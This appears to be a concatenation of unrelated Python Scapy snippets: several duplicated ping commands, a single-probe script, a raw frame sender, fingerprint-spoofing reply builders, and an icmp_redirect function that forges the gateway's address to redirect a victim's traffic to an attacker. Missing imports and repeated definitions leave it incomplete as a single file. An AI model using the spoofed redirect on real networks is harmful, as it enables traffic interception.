def icmp_redirect(ip_gw, ip_victim, ip_attacker, ip_targetroute):
    """Send one spoofed ICMP Redirect (type 5, code 1) to a host.

    The outer IP header claims to come from ``ip_gw`` and is addressed to
    ``ip_victim``; the ICMP redirect names ``ip_attacker`` in its gateway
    field.  The ICMP payload quotes a fabricated ``ip_victim`` ->
    ``ip_targetroute`` IP header followed by an ICMP type 0 / code 0
    (echo-reply) header, i.e. the datagram the redirect refers to.

    Args:
        ip_gw (str): Gateway IP, used as the spoofed source address.
        ip_victim (str): Target/Victim IP the redirect is sent to.
        ip_attacker (str): IP advertised in the redirect's gateway field.
        ip_targetroute (str): Destination IP of the route being redirected,
            placed in the quoted inner IP header.

    Returns:
        None.  The packet is handed to ``send`` and no reply is collected.

    Note:
        The outgoing interface is hard-coded to ``"eth1"``; there is no
        ``interface`` parameter, so the call fails on hosts without that
        interface name.
    """
    ip = IP()
    ip.src = ip_gw
    ip.dst = ip_victim
    icmp = ICMP()
    icmp.type = 5  # redirect
    icmp.code = 1  # redirect datagram for the host
    icmp.gw = ip_attacker
    # Quoted datagram carried in the redirect's payload.
    ip2 = IP()
    ip2.src = ip_victim
    ip2.dst = ip_targetroute
    icmp2 = ICMP()
    icmp2.type = 0  # echo-reply
    icmp2.code = 0
    # Send packets at Layer 3 (Scapy creates the Layer 2 header); does not receive any packets.
    send(ip / icmp / ip2 / icmp2, iface="eth1")
def cmd_icmp_ping(ip, interface, count, timeout, wait, verbose):
    """The classic ping tool that sends ICMP echo requests.

    Sends one echo-request to ``ip`` per iteration with ``sr1`` and prints
    the reply (``show()`` when ``verbose``, otherwise ``summary()``), or
    ``Timeout`` when none arrives within ``timeout`` seconds.  Calls
    ``sleep(wait)`` between probes and stops after ``count`` probes;
    ``count`` of 0 means run until interrupted.  Always returns True.

    \b
    # habu.icmp.ping 8.8.8.8
    IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
    IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
    IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
    IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
    """
    if interface:
        conf.iface = interface
    conf.verb = False
    conf.L3socket = L3RawSocket

    # Same fixed header values, set through the layer constructors.
    header = IP(dst=ip, tos=0, id=1, flags=0, frag=0, ttl=64, proto=1)
    echo = ICMP(type=8, code=0, id=0, seq=0)
    probe = header / echo

    sent = 0
    while True:
        reply = sr1(probe, timeout=timeout)
        if not reply:
            print('Timeout')
        elif verbose:
            reply.show()
        else:
            print(reply.summary())
        sent += 1
        # count == 0 means unlimited.
        if count != 0 and sent == count:
            return True
        sleep(wait)
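def udp_craft(pkt, mac, fp):
    """Craft the ICMP destination-unreachable reply for a received UDP probe.

    Mirrors the probe back to its sender: the outer IP header swaps
    ``pkt``'s addresses, the ICMP layer is type 3 / code 13, and the quoted
    ``IPerror``/``UDPerror`` headers plus the probe's ``Raw`` payload follow.
    Header values come from the ``U1`` section of the fingerprint ``fp``.

    Args:
        pkt: Received scapy packet; must carry IP, UDP and Raw layers.
            An Ether layer is optional.
        mac (str): Source MAC for the Ethernet header, used only when
            ``pkt`` itself has an Ether layer.
        fp: Fingerprint object exposing ``fp.probe['U1']`` with the keys
            ``TTL``, ``DF``, ``RIPL``, ``RID``, ``RIPCK`` and ``RUCK``.

    Returns:
        The crafted scapy packet ``ip/icmp/iperror/udperror/data``, with
        an Ether header prepended when ``pkt`` had one.

    Raises:
        IndexError: when ``pkt`` lacks the IP, UDP or Raw layer.
        KeyError: when a required ``fp.probe['U1']`` key is missing.
    """
    try:
        ether = Ether()
        ether.src = mac
        ether.dst = pkt[Ether].dst
        ether.type = 0x800
    except IndexError:
        # pkt[Ether] raises IndexError when the probe carries no Ethernet
        # header; the reply is then built from layer 3 up.
        ether = None

    u1 = fp.probe['U1']

    ip = IP()
    ip.src = pkt[IP].dst
    ip.dst = pkt[IP].src
    ip.ttl = int(u1['TTL'], 16)  # fingerprint stores the TTL as a hex string
    ip.flags = u1['DF']
    # Fixed total length and IP id for the crafted reply.
    ip.len = 56
    ip.id = 4162

    icmp = ICMP()
    icmp.type = 3
    icmp.unused = 0
    # NOTE(review): code 13 is "communication administratively prohibited";
    # the original comment mentioned code 3 (port unreachable) — confirm
    # which value the fingerprint is meant to produce.
    icmp.code = 13

    iperror = IPerror()
    iperror.proto = 'udp'
    iperror.ttl = 0x3E
    iperror.len = u1['RIPL']
    iperror.id = u1['RID']
    # RIPCK: 'G' leaves chksum unset, 'Z' zeroes it, anything else echoes
    # the probe's own IP checksum back.
    ripck_val = u1['RIPCK']
    if ripck_val == 'Z':
        iperror.chksum = 0
    elif ripck_val != 'G':
        iperror.chksum = pkt[IP].chksum

    udperror = UDPerror()
    udperror.sport = pkt[UDP].sport
    udperror.dport = pkt[UDP].dport
    udperror.len = pkt[UDP].len
    # RUCK: 'G' echoes the probe's UDP checksum, otherwise the raw value.
    if u1['RUCK'] == 'G':
        udperror.chksum = pkt[UDP].chksum
    else:
        udperror.chksum = u1['RUCK']

    # (The former unused 'IPL' lookup was dead code and has been removed.)
    data = pkt[Raw].load
    if ether is None:
        return ip / icmp / iperror / udperror / data
    return ether / ip / icmp / iperror / udperror / data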
def cmd_ping(ip, interface, count, timeout, wait, verbose):
    """The classic ping tool that sends ICMP echo requests.

    Each probe is an ICMP echo-request to ``ip`` sent with ``sr1``; the
    reply is printed with ``show()`` when ``verbose`` or ``summary()``
    otherwise, and ``Timeout`` is printed when nothing arrives within
    ``timeout`` seconds.  ``sleep(wait)`` separates probes.  A ``count``
    of 0 runs until interrupted.  Always returns True.

    \b
    # habu.ping 8.8.8.8
    IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
    IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
    IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
    IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
    """
    if interface:
        conf.iface = interface
    conf.verb = False
    conf.L3socket = L3RawSocket

    ip_hdr = IP()
    ip_hdr.dst = ip
    ip_hdr.tos = 0
    ip_hdr.id = 1
    ip_hdr.flags = 0
    ip_hdr.frag = 0
    ip_hdr.ttl = 64
    ip_hdr.proto = 1  # icmp

    icmp_hdr = ICMP()
    icmp_hdr.type = 8  # echo-request
    icmp_hdr.code = 0
    icmp_hdr.id = 0
    icmp_hdr.seq = 0

    probe = ip_hdr / icmp_hdr

    # remaining counts down only when count is non-zero.
    remaining = count
    while True:
        reply = sr1(probe, timeout=timeout)
        if reply:
            if verbose:
                reply.show()
            else:
                print(reply.summary())
        else:
            print('Timeout')
        if count != 0:
            remaining -= 1
            if remaining == 0:
                break
        sleep(wait)
    return True
def icmp_craft(pkt, fp, mac):
    """Build the ICMP echo-reply that matches the fingerprint's IE probe.

    Swaps the probe's IP addresses, derives TTL, DF flag, IP id and ICMP
    code from ``fp.probe['IE']`` and ``fp.ip_id_icmp_gen()``, and echoes
    the probe's ICMP id, sequence number and payload back.

    Args:
        pkt: Received scapy packet with IP and ICMP layers (Ether optional).
        fp: Fingerprint object exposing ``fp.probe['IE']`` (keys ``TTL``,
            ``DFI``, ``CD``) and ``ip_id_icmp_gen()``.
        mac (str): Source MAC for the Ethernet header, used only when
            ``pkt`` has one.

    Returns:
        The crafted scapy packet ``ip/icmp/data``, with an Ether header
        prepended when ``pkt`` had one.
    """
    try:
        link = Ether()
        link.src = mac
        link.dst = pkt[Ether].dst
        link.type = 0x800
    except IndexError:
        link = None  # probe carried no Ethernet layer

    ie = fp.probe['IE']
    probe_ip = pkt[IP]
    probe_icmp = pkt[ICMP]

    ttl = int(ie['TTL'], 16)  # hex string in the fingerprint

    # DFI: N = clear DF, S = same as probe, Y = set DF, anything else = toggle.
    dfi = ie['DFI']
    if dfi == 'N':
        df_flags = 0
    elif dfi == 'S':
        df_flags = probe_ip.flags
    elif dfi == 'Y':
        df_flags = 2
    else:
        df_flags = 2 if probe_ip.flags != 2 else 0

    ip = IP()
    ip.src = probe_ip.dst
    ip.dst = probe_ip.src
    ip.ttl = ttl
    ip.flags = df_flags
    ip.id = fp.ip_id_icmp_gen()

    icmp = ICMP()
    icmp.type = 0  # echo-reply
    icmp.id = probe_icmp.id
    # CD: Z = zero code, S = same as probe, anything else = random 0..15.
    cd = ie['CD']
    if cd == 'Z':
        icmp.code = 0
    elif cd == 'S':
        icmp.code = probe_icmp.code
    else:
        icmp.code = random.randint(0, 15)
    icmp.seq = probe_icmp.seq

    data = probe_icmp.payload
    if link is None:
        return ip / icmp / data
    return link / ip / icmp / data
def cmd_ping(ip, interface, count, timeout, wait, verbose):
    """Send ICMP echo-requests to ``ip`` and print each reply or ``Timeout``.

    Sets scapy's ``conf`` (interface when given, quiet mode, raw L3
    socket), then loops: ``sr1`` one echo-request with ``timeout``,
    report the result (``show()`` when ``verbose``, else ``summary()``),
    and ``sleep(wait)`` before the next probe.  Stops after ``count``
    probes; ``count`` of 0 means unlimited.  Always returns True.
    """
    if interface:
        conf.iface = interface
    conf.verb = False
    conf.L3socket = L3RawSocket

    network = IP()
    network.dst = ip
    network.tos = 0
    network.id = 1
    network.flags = 0
    network.frag = 0
    network.ttl = 64
    network.proto = 1  # icmp

    transport = ICMP()
    transport.type = 8  # echo-request
    transport.code = 0
    transport.id = 0
    transport.seq = 0

    probe = network / transport

    def report(reply):
        # Print the reply in the requested verbosity, or 'Timeout' for none.
        if not reply:
            print('Timeout')
        elif verbose:
            reply.show()
        else:
            print(reply.summary())

    sent = 0
    keep_going = True
    while keep_going:
        report(sr1(probe, timeout=timeout))
        sent += 1
        # Stop once count (non-zero) probes have been sent; no sleep after the last.
        keep_going = count == 0 or sent != count
        if keep_going:
            sleep(wait)
    return True
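#!/usr/bin/python
"""Send one ICMP probe to the IP given on the command line and report the outcome."""
import sys

from scapy.all import IP, ICMP, sr1

# Seconds to wait for a reply before giving up (constructed default; the
# original sr1() call had no timeout and could block indefinitely).
REPLY_TIMEOUT = 2


def main(argv=None):
    """Parse the target IP, send the probe and print what came back.

    Args:
        argv: Argument list including the program name; defaults to
            ``sys.argv``.

    Returns:
        0 after the probe was sent, 1 on a usage error.
    """
    argv = sys.argv if argv is None else argv
    # Give IP when running this
    if len(argv) != 2:
        print("Usage: " + argv[0] + " ip")
        return 1

    # Craft IP header
    ip_packet = IP()
    ip_packet.dst = argv[1]
    # ICMP type stays at scapy's default (8, echo-request); code 1 is a
    # non-zero code for that type — presumably deliberate, confirm.
    icmp_packet = ICMP()
    icmp_packet.code = 1
    payload = "abcdefghijklmnopqrstuvwxyz"

    reply = sr1(ip_packet / icmp_packet / payload, timeout=REPLY_TIMEOUT)
    if reply is None:
        print("No reply within %d seconds" % REPLY_TIMEOUT)
    else:
        print(reply.summary())
    return 0


if __name__ == "__main__":
    sys.exit(main())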
#*** Get parameters from command line
SRC_MAC = sys.argv[1]
DST_MAC = sys.argv[2]
SRC_IP = sys.argv[3]
DST_IP = sys.argv[4]
IF_NAME = sys.argv[5]
REPEAT_INTERVAL = float(sys.argv[6])
REPEAT_COUNT = int(sys.argv[7])

data = "blahblahblah"

# Fixed headers: Ethernet/IP addresses from the command line, ICMP echo-request.
eth = Ether(src=SRC_MAC, dst=DST_MAC)
ip = IP(src=SRC_IP, dst=DST_IP)
icmp = ICMP(type=8, code=0)

# Send at layer 2 on IF_NAME, pausing REPEAT_INTERVAL seconds after each frame.
# At least one frame is always sent; the loop ends once REPEAT_COUNT is reached.
count = 0
while True:
    sendp(eth / ip / icmp / data, iface=IF_NAME)
    time.sleep(REPEAT_INTERVAL)
    count += 1
    if count >= REPEAT_COUNT:
        break